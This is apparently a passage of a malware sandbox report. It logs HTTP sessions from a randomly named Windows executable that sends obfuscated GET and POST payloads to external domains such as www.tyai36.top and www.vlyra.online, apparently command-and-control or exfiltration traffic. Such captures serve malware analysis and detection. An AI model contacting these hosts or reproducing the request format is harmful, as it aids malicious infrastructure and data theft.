Aug 27, 2024 17:47:09.920715094 CEST	9023	OUT	Data Raw: 74 49 6e 6b 7a 64 50 59 53 53 42 53 61 59 42 70 38 61 72 69 75 35 52 4d 47 4a 70 71 47 37 44 6d 50 36 50 4f 78 6a 43 33 30 70 68 4f 6f 30 69 6e 51 43 39 49 4e 50 35 4a 6d 65 78 72 54 62 66 42 4f 55 6d 66 62 74 6a 39 65 30 47 71 33 41 39 62 62 51 Data Ascii: tInkzdPYSSBSaYBp8ariu5RMGJpqG7DmP6POxjC30phOo0inQC9INP5JmexrTbfBOUmfbtj9e0Gq3A9bbQypSQtkj2o9aIFvPxrOIIDN11fgHbP7+3qIXbMeRFipLbzMO6HMSb1ExnmMtq1AOlgGBOuExShoAw42/68tSGHT/cWU+XDSj9Kmfh9o2s7Fh3IbCYZzBrRL8MSB+Z63MBq8Juac+xQKl2RMp/BhEVVZSAwnFLOA7Ot
Aug 27, 2024 17:47:10.100521088 CEST	1289	OUT	Data Raw: 73 38 62 39 30 65 33 49 69 34 52 74 6f 43 59 55 7a 76 70 51 57 37 38 6e 78 49 37 73 46 7a 45 73 44 58 7a 76 74 46 45 79 76 48 48 42 31 6d 6b 33 42 58 6c 42 62 46 31 69 43 59 33 35 45 4e 79 53 39 32 61 30 42 79 4b 4c 45 73 73 42 4f 42 55 59 37 4f Data Ascii: s8b90e3Ii4RtoCYUzvpQW78nxI7sFzEsDXzvtFEyvHHB1mk3BXlBbF1iCY35ENyS92a0ByKLEssBOBUY7O9pJv1ZpDeth0pNXlFn4zWZ6sNx0PGrz3FzzSrphltF2BTT6x+/fvZxQMsgiM6vtuIAnN+BUQQYD7ERVO0F6sSzscb2TkTcZnwuHOlGwuXedIN+xSMpHdSEZHKhvvnlmHpkWNr/AkaB7LEwgxHh0BIFvrg+dgAGKdb
Aug 27, 2024 17:47:10.100584984 CEST	6445	OUT	Data Raw: 71 42 72 2f 6b 74 6a 63 2f 6c 33 49 69 36 4b 54 42 56 33 70 54 75 31 30 35 37 43 39 6f 7a 39 79 4f 55 6c 34 6e 6c 64 75 63 58 4d 45 6b 4a 49 71 49 6d 6d 39 69 73 57 66 4a 34 34 75 39 70 77 61 31 37 6c 6a 46 6a 63 49 4d 59 37 43 49 43 31 6d 61 2f Data Ascii: qBr/ktjc/l3Ii6KTBV3pTu1057C9oz9yOUl4nlducXMEkJIqImm9isWfJ44u9pwa17ljFjcIMY7CIC1ma/+aRHxh3DnqRYvvrvC/cjffk+Cr10uYrrGTPCsLLf99BO4WAH2zfGLO1oM6TLg4fVEC1SmSVjnSI8HjMX4FxuNHdqPNuC4SSttTbFZw4eRk/Y6YOwb7CFMhntRllHoda2i4mOoSZgq4Mkx5sciTaYvZSu1RZYf+uBq
Aug 27, 2024 17:47:10.100652933 CEST	5156	OUT	Data Raw: 51 55 55 74 30 72 6e 4e 4a 50 70 6f 78 39 30 38 47 67 4e 54 41 44 39 74 54 51 73 51 4b 43 32 4e 53 5a 79 76 4c 37 36 48 5a 31 6e 51 6d 67 38 75 2b 65 50 68 39 51 31 64 54 64 54 79 47 6c 6a 78 70 75 67 54 54 4c 46 59 70 4f 31 63 46 62 52 4f 4a 37 Data Ascii: QUUt0rnNJPpox908GgNTAD9tTQsQKC2NSZyvL76HZ1nQmg8u+ePh9Q1dTdTyGljxpugTTLFYpO1cFbROJ7E7Xp3i9OHBLkVAJfKYHHCwqFSwJMySyKIBhY/1MEF0GqBBSUGJzoHJrHPChOV4HszOX3rXaZVzjPgl1Sx2zpXcAkyp4h8vmjLUFAOkVtFkg0Y0twzepGOwCVGRdBktkby3xHNa68LfeAw5es3g4P3DWsvFvqJRMvt
Aug 27, 2024 17:47:10.100811958 CEST	3867	OUT	Data Raw: 51 39 47 2b 71 79 32 66 78 64 2f 73 37 77 76 63 35 73 79 6e 42 54 45 50 6b 43 4a 34 66 36 78 78 70 4d 36 46 31 31 51 43 53 6c 2f 69 78 55 47 6c 67 35 2f 30 68 47 56 69 5a 47 32 55 42 77 43 6e 66 54 76 4f 44 38 6d 4b 38 59 53 4e 6b 77 71 67 4b 65 Data Ascii: Q9G+qy2fxd/s7wvc5synBTEPkCJ4f6xxpM6F11QCSl/ixUGlg5/0hGViZG2UBwCnfTvOD8mK8YSNkwqgKeN9/FDVKJKYAup/XE4YE2XJ0KkVBgj3U9iCfcOS74WDC4NS1hVY7YIX2UFN+Tqu28KF5q23V1c1MxMMP2JpwMJK4aqYr8pIJDqg+lVytoQmroJwac2QPH8mXTgnQvkzx89qKKBrqrMXW2h+EdO9XkUy6cE4ynjDjH6
Aug 27, 2024 17:47:10.101027966 CEST	9023	OUT	Data Raw: 42 6d 6e 6d 46 57 47 33 4e 4c 55 67 33 4e 6e 61 49 39 6b 49 53 6f 4a 2f 79 2f 31 5a 30 2f 63 44 37 79 49 39 4e 31 73 30 36 6e 4f 45 58 37 73 32 52 48 6a 6b 6e 33 74 75 61 66 79 71 45 58 43 63 36 46 66 34 54 59 52 35 68 58 48 37 31 54 36 71 48 62 Data Ascii: BmnmFWG3NLUg3NnaI9kISoJ/y/1Z0/cD7yI9N1s06nOEX7s2RHjkn3tuafyqEXCc6Ff4TYR5hXH71T6qHbTUFL5aZfA7K3QLbqXitfcjJe4pxbqcPEzc7SFX1CMvQBQlmqJbGB/Wd3K/F6OruY+guvIiZANGFgNSHU3WNBmqWQjjnHmrurFaIef2oNhGYjhlkNa0SKHvmMwOlxgRIAKwZ5o4XsHmqPlFubUrQwYV1FAyDVe6F9x
Aug 27, 2024 17:47:10.281002998 CEST	2578	OUT	Data Raw: 67 63 35 4c 2b 69 44 70 76 77 32 47 67 42 4a 52 4f 47 4d 42 77 42 6c 30 31 30 63 4c 70 69 55 52 39 78 5a 4f 72 57 6d 52 43 65 72 5a 54 6d 56 68 32 70 44 47 32 63 2f 51 5a 6c 4b 71 5a 54 6b 51 49 47 4e 2f 4d 63 61 79 2f 6e 54 33 4d 79 35 6f 45 4e Data Ascii: gc5L+iDpvw2GgBJROGMBwBl010cLpiUR9xZOrWmRCerZTmVh2pDG2c/QZlKqZTkQIGN/Mcay/nT3My5oENFvjBDq2hBOd8vfHHlNtVaX2wEH4o3TjH7yeNJaNZYoIxP0Fj1MoGakQR1zkRWDJzSjgLjwOo5TaEmy4ATs+d+lqhhLqIe+AjJNhmNWWbB77CSPJ6/oz9WMhZUM9kSK0u8uOa6oxwH9xMDBxbtjfdFWglsQGDFlnqf
Aug 27, 2024 17:47:10.281105042 CEST	5156	OUT	Data Raw: 54 2f 79 52 57 6f 77 4a 48 53 6a 6c 6e 73 54 59 4a 31 71 78 44 33 2b 68 33 51 2f 57 32 5a 43 37 64 4e 64 66 2f 59 61 38 36 57 76 4e 2b 2f 4e 39 4f 73 76 74 46 4f 77 48 5a 2f 4c 7a 52 6b 62 33 38 73 79 49 70 65 50 35 4c 6b 32 2f 75 6a 69 78 2b 50 Data Ascii: T/yRWowJHSjlnsTYJ1qxD3+h3Q/W2ZC7dNdf/Ya86WvN+/N9OsvtFOwHZ/LzRkb38syIpeP5Lk2/ujix+PHGfo+rXl5iYp6XMz544js9Aqe7Ku4uOYu/ZtUDv/buQ3HinEYPQ8jpGlJ+Jayajt26HRbWPyzBO9RjS4sPpUmv0OK377GK6cssucXyxzWvDBUdpgVK5e7EuMd7WJgzP1LfscaqQrABHoIqF/v3Cq+kXD26PafZ63X
Aug 27, 2024 17:47:10.281166077 CEST	7114	OUT	Data Raw: 41 4c 47 34 48 62 46 55 62 68 70 47 4e 4a 68 6f 69 4e 35 46 5a 6f 63 6b 36 53 73 53 54 51 72 39 4b 66 62 61 48 41 4f 42 65 68 52 31 32 35 75 44 4f 33 73 46 45 4c 6a 34 64 4a 72 33 65 52 32 61 30 32 2f 70 51 36 2b 69 53 39 6c 6b 75 38 79 42 76 4c Data Ascii: ALG4HbFUbhpGNJhoiN5FZock6SsSTQr9KfbaHAOBehR125uDO3sFELj4dJr3eR2a02/pQ6+iS9lku8yBvLmkdyiulisQjUddGpM72fWhEjUNoWYF1jta7hhp78Xf8ChysohFd3cCHMyOTngdO95M/1u/5oSRttl6oRL5HpeOH9d8FTmR1XNizPhn5W/W9AUVlg3FKIz30tMXQkwKfepB8cuXVKDz7O3yQ7TSVhXr0MpjkIq5n2G
Aug 27, 2024 17:47:10.488800049 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 15:47:10 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Aug 27, 2024 17:47:10.489088058 CEST	1289	IN	Data Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	49815	203.161.42.73	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:47:12.621155024 CEST	525	OUT	GET /evtw/?AvLLLbOh=qMLUfIVxcy5BUPOFUVVokgWijQnF2zXXVKt01YDq7Fx24AU1CDxJrzkqkKWLAIZ/xY36wLggT1PRMlR6dRNA0wLKv5lzUDW7qQMZ0amG/MTffFaAFzA5nlM=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.vlyra.online Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:47:12.797327042 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 15:47:12 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Aug 27, 2024 17:47:12.797436953 CEST	1289	IN	Data Raw: 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 Data Ascii: "translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1
Aug 27, 2024 17:47:12.797532082 CEST	1289	IN	Data Raw: 39 39 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 Data Ascii: 99 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.00
Aug 27, 2024 17:47:12.797597885 CEST	1289	IN	Data Raw: 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 Data Ascii: roke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -
Aug 27, 2024 17:47:12.797657013 CEST	1289	IN	Data Raw: 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e Data Ascii: ay:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14
Aug 27, 2024 17:47:12.797712088 CEST	1289	IN	Data Raw: 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 Data Ascii: 23.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.5322
Aug 27, 2024 17:47:12.797770977 CEST	1289	IN	Data Raw: 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 Data Ascii: 412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545"
Aug 27, 2024 17:47:12.798173904 CEST	1289	IN	Data Raw: 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 Data Ascii: 6" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.
Aug 27, 2024 17:47:12.798250914 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 Data Ascii: id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse
Aug 27, 2024 17:47:12.798314095 CEST	1289	IN	Data Raw: 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a Data Ascii: 0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170
Aug 27, 2024 17:47:12.963604927 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a Data Ascii: transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.3694

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.20	49816	38.47.207.120	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:47:18.664393902 CEST	782	OUT	POST /7te8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.tyai36.top Origin: http://www.tyai36.top Referer: http://www.tyai36.top/7te8/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 75 42 6c 59 77 2f 44 78 48 63 6f 4d 48 70 62 75 38 74 48 54 68 79 76 38 2b 55 38 63 68 59 49 46 65 67 32 7a 61 48 4c 7a 41 72 6f 51 30 2f 47 51 67 4e 78 77 4a 67 52 45 36 4f 2f 45 31 49 6d 46 68 7a 43 68 64 30 65 57 32 6a 50 39 54 31 42 79 7a 77 5a 4a 66 33 31 53 6f 41 53 76 4f 55 66 39 63 6f 36 66 36 57 51 6c 36 47 33 4c 4b 63 63 45 35 48 31 6f 49 55 59 39 5a 75 31 65 58 4a 48 58 46 7a 4c 4e 6e 43 56 44 62 4e 4d 2b 7a 39 6b 43 61 45 4d 69 53 62 45 59 6e 6c 39 38 72 39 4e 55 51 48 4d 6c 68 79 46 34 6f 7a 49 57 6b 34 57 6e 67 73 61 2f 4c 61 7a 41 43 79 32 63 66 76 35 51 2f 51 3d 3d Data Ascii: AvLLLbOh=uBlYw/DxHcoMHpbu8tHThyv8+U8chYIFeg2zaHLzAroQ0/GQgNxwJgRE6O/E1ImFhzChd0eW2jP9T1ByzwZJf31SoASvOUf9co6f6WQl6G3LKccE5H1oIUY9Zu1eXJHXFzLNnCVDbNM+z9kCaEMiSbEYnl98r9NUQHMlhyF4ozIWk4Wngsa/LazACy2cfv5Q/Q==
Aug 27, 2024 17:47:18.965771914 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:47:18 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66b12d1b-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.20	49817	38.47.207.120	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:47:21.529053926 CEST	1122	OUT	POST /7te8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.tyai36.top Origin: http://www.tyai36.top Referer: http://www.tyai36.top/7te8/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 75 42 6c 59 77 2f 44 78 48 63 6f 4d 42 4a 72 75 2b 4d 48 54 6e 53 76 2f 37 55 38 63 76 34 49 42 65 67 71 7a 61 44 37 6a 48 59 4d 51 31 65 32 51 6e 49 64 77 4f 67 52 45 69 65 2f 42 32 34 6d 4f 68 7a 66 42 64 30 53 57 32 6a 4c 39 42 33 35 79 69 77 5a 4b 51 58 31 54 72 41 53 69 5a 45 66 4e 63 6f 32 44 36 58 30 6c 36 32 62 4c 62 75 45 45 75 43 4a 76 4d 30 59 37 66 75 31 64 4f 5a 48 4a 46 7a 33 76 6e 44 39 54 62 2b 51 2b 7a 64 45 43 5a 45 4d 68 61 72 45 66 72 46 38 70 6d 50 39 65 54 30 45 59 6e 79 74 39 76 42 30 35 6e 66 36 2f 69 73 6d 48 55 4c 50 6a 44 43 50 33 4b 63 55 46 37 44 52 6c 75 39 76 44 74 46 71 56 64 6b 62 37 6d 4b 57 69 43 36 7a 41 2f 79 52 30 30 77 4a 4a 6a 33 34 41 36 2f 58 74 44 39 65 6c 6d 54 59 4c 51 78 6f 34 52 59 33 6e 5a 75 68 72 4c 36 47 67 36 73 44 6b 42 42 71 54 4d 4c 75 44 37 42 64 71 44 65 51 77 4c 47 5a 53 34 42 6c 5a 4d 63 48 59 36 5a 7a 41 6a 78 56 35 38 51 4b 56 70 34 37 46 4a 64 51 4f 67 49 47 4b 47 74 72 6f 6e 69 70 5a 78 57 71 6c 44 51 6e 4f 41 [TRUNCATED] Data Ascii: AvLLLbOh=uBlYw/DxHcoMBJru+MHTnSv/7U8cv4IBegqzaD7jHYMQ1e2QnIdwOgREie/B24mOhzfBd0SW2jL9B35yiwZKQX1TrASiZEfNco2D6X0l62bLbuEEuCJvM0Y7fu1dOZHJFz3vnD9Tb+Q+zdECZEMharEfrF8pmP9eT0EYnyt9vB05nf6/ismHULPjDCP3KcUF7DRlu9vDtFqVdkb7mKWiC6zA/yR00wJJj34A6/XtD9elmTYLQxo4RY3nZuhrL6Gg6sDkBBqTMLuD7BdqDeQwLGZS4BlZMcHY6ZzAjxV58QKVp47FJdQOgIGKGtronipZxWqlDQnOA7HnTZNYuZsQMFBC26G1ggrA5dn9F8wm8rZ9CcWEI9sWUk6xo/g03K/oJJdCcVbgJypFxX/tARlyVhj1uwFjERhAdGRVltiCVIEcgIl080yaie1fME2LLmq5/SZ7uGZ2Xc5hpdRcYIAikjo4L13+KS1YH1i0oZP4kIquAqUF0FmzY9mP2N34omTGHAd6GegCSTXrAe1W6GuipCA=
